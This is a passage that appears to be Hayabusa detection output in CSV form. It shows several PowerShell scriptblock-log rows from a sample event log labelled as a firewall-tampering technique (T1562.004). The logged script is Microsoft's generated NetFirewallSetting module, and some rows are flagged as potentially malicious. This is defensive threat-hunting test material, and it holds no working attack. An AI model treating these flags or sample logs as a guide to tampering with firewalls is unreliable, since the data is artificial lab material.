(cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$_",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.531 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$_",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.531 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"_cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.531 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"_cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 